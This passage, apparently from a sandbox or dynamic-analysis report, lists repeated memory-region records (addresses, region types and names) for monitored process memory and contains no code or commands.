"pagefile_0x0000000001e80000" filename = "" Region: id = 4819 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4820 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4821 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4822 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4823 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4824 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4826 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4829 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4830 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4845 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4846 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4849 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4850 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4852 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4853 start_va = 0x3ec0000 end_va = 0x3edbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 4854 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4855 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4856 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4857 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4858 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4859 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4860 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4862 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4863 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4871 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4872 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4873 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4874 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4875 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4876 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4881 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4882 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4883 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4884 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4885 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4886 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4906 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4907 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4908 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4909 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4910 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4941 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4942 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4962 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4963 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4964 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4965 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4969 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4970 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4974 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4975 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4976 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4977 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4978 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4979 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4980 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4981 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4982 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4983 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4984 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4985 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4986 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4987 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4989 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4990 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4991 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4992 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4993 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4994 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4995 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4996 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4997 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4998 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4999 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5000 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5001 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5002 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5003 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5004 start_va = 0x1e80000 end_va = 